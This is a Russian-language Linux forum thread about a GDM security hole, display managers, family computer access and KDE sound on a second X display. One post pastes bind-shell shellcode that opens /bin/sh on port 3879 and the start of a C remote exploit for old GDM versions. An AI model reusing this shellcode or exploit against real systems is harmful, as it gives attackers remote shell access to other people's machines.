ну не понимаю я кому не хватает .xsession. Настрой его как хочешь. Можешь там даже выбор оболочки делать, но я не понимаю зачем одному юзеру много оболочек.
Кстати, масяныч, фришники ОЧЕНЬ любят напоминать что такие штучки как гном/мозилла/кде/... у них тоже есть и ими пользуются. Значит эта уязвимость касается и фри, не так ли ?
dilmah, anonymous (*) (2003-08-25 17:04:31.442429) правильно сказал, именно этим xdm и убог. DM должен позволять перезагружать/выключать комп и выбрать среду из имеющихся, а от детей надо лочить комп, ибо убогость - не панацея. Еще DM, лично на мой взгляд, должен иметь приятный внешний вид и быть в этом плане конфигурябельным. Все это есть в GDM.
чтобы перезагрузить машину xdm не нужен.
А вот запустить удаленную Х-сессию (допустим с виндовс
машины) и с нормальным WM отстаротованным на Linux-машине -
вот для чего он нужен.
Во народ - без мышки комп перезагрузить/становить не может,
а нах уже посылать научился :)
"Пить-курить-систему_администрить я начал аднавременна!"
/* lammys bind shell code / binds a shell to port 3879 */
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
int resolve (char *denise)
{
struct hostent *info;
unsigned long ip;
if ((ip=inet_addr(denise))==-1)
{
if ((info=gethostbyname(denise))==0)
{
printf("Couldn't resolve [%s]\n", denise);
exit(0);
}
memcpy(&ip, (info->h_addr), 4);
}
return (ip);
}
int main (int argc, char **argv)
{
char uhm;
int nadine;
short blah[6];
char buffy[1400]; /* you might make this buffer bigger to increase the
probability to hit the right addy. making the
buffer too big could destroy the code though */
unsigned long addy;
struct sockaddr_in stephanie;
char big_buffy[sizeof(buffy)+12];
if (argc < 3)
{
printf("\nGDM 2.0betaX exploit by AbraxaS (abraxas@sekure.de)"
"\nUsage: %s [target] [offset]\n", argv[0]);
exit(0);
}
Versions of GDM prior to 2.4.1.6 contain a bug where GDM will run as root
when examining the ~/.xsession-errors file when using the "examine session
errors" feature, allowing local users the ability to read any text file
on the system by creating a symlink
Кстати, масяныч, фришники ОЧЕНЬ любят напоминать что такие штучки как гном/мозилла/кде/... у них тоже есть и ими пользуются. Значит эта уязвимость касается и фри, не так ли ?
Может быть, но пока тишина, последний SA от 10 августа.
anonymous (*) (2003-08-25 17:39:03.0542)
> Во народ - без мышки комп перезагрузить/становить не может, а нах уже посылать научился :)
Это откуда у тебя такие выводы? Я умею замечательно выключать/перезагружать комп из командной строки (и без переключения в консоль), просто, раз уж я пользуюсь графической средой, я желаю из графической же среды это и делать. Я доступно объясняю?
хм. недавно ставил SA для древней FreeBSD 4.4
Так во - апдейтов ядерных там было 5 серьезных, остальные для сервисов - 4 штуки. Кто может показать что не более 10-ти было с тех пор для Линуха ? Больше, намного больше.
>>>>>>> хм. недавно ставил SA для древней FreeBSD 4.4 Так во - апдейтов ядерных там было 5 серьезных, остальные для сервисов - 4 штуки. Кто может показать что не более 10-ти было с тех пор для Линуха ? Больше, намного больше.
А что у вас на той машинке есть-то ? вы же не хотите сказать что вашему апачу не требуются апдейты в отличии от линуксового ? Или openssl у вас там особый ? Могу сказать что только для двух этих вещей апдейтов бутет намного больше чем 10.
anonymous (*) (2003-08-25 17:34:34.441589)
>правильно сказал, именно этим xdm и убог. DM должен позволять >перезагружать/выключать комп и выбрать среду из имеющихся, а >от детей надо лочить комп, ибо убогость - не панацея. Еще DM, >лично на мой взгляд, должен иметь приятный внешний вид и быть в >этом плане конфигурябельным. Все это есть в GDM.
нет, у детей должен быть свой комп. С ОС на которой можно играть
(в меру) и чему нибудь учится. И чтобы это было удобно (для детей,
опять же, а не для гиков что тут тусят ;) )
И вообще, кто в своем уме от родни комп лочит ?
Вы че мужики !??
>Я. У меня же там дисер. Включать/выключать/перезагружать/работать/играть под своим логином - ну сколько угодно
А СDR-RW зачем ?
Кстати а чего такого страшного если комп перегрузят/выключат
через (G/K/X)DM ?
Эт -ж не шнурок выдернуть - вот свой пароль детям говорить
точно не нужно ;) А так пусть играют ....
Гм, а че пару линухов поставить - жаба давит или религиозные убеждения запрещают? Oдин для себя, другой для жены/отроков - и пусть там себе резвятся :)
а проверьте ка меня на сисадмина
P.S 8 батлов пива за раз выпить могу.
pps ну и уроды те кто лочат комп от своей семьи ...
прально сказали бэкапы делать нужно ..
вот захочет кто программку поставить, опа - контакт ёр систем
администратор. (естст я имею ввиду нт 5+)
Кто-то на слэшдоте интересную мысль толкнул... что поскольку они не считают GPL валидной, они тем самым нарушают копирайт целой толпы людей... и по DMCA их за это можно немедля вырубить, а разборки опосля устраивать...
гы... шютка наверное
> pps ну и уроды те кто лочат комп от своей семьи ...
> прально сказали бэкапы делать нужно ..
Это ты урод. А у меня кроме бэкапов - отдельный логин для себя, отдельный (автологином!) - для семьи.
ЗЫ - спасет ли тебя бэкап скажем от того что кто-то когда-то стер пару страниц из 200/300 стр документа ? Ты этого по горячим следам не найдешь, а когда обнаружишь то обнаружишь что и бэкап то у тебя свеженький и в нем то же самое.
>> "Гм, а че пару линухов поставить - жаба давит или религиозные убеждения запрещают? Oдин для себя, другой для жены/отроков - и пусть там себе резвятся :)"
Многопользовательская система. Каждому пользователю - по отдельному разделу со своей операционкой.
Раз уж тут пошло про много пользовательскую систему... То у меня вопрос. Почему в KDE если я залогинился на display :0, а потом для жены делаю "(X :1 &); env DISPLAY=:1 startkde". Во второй копии KDE (который на display :1) звука нет, я понимаю что /dev/dsp занят первой копией kde, но как это лечить???
нет, боюсь наврал про моду, думал жена под своим логином работает,
а по тому как ты написал можно понять, что обе Хсессии - твои.
возможно это связано со звуковыми серверами(art или esd) -
второй кде стартует свой саунд-сервер, а /dev/dsp уже занят. копать надо...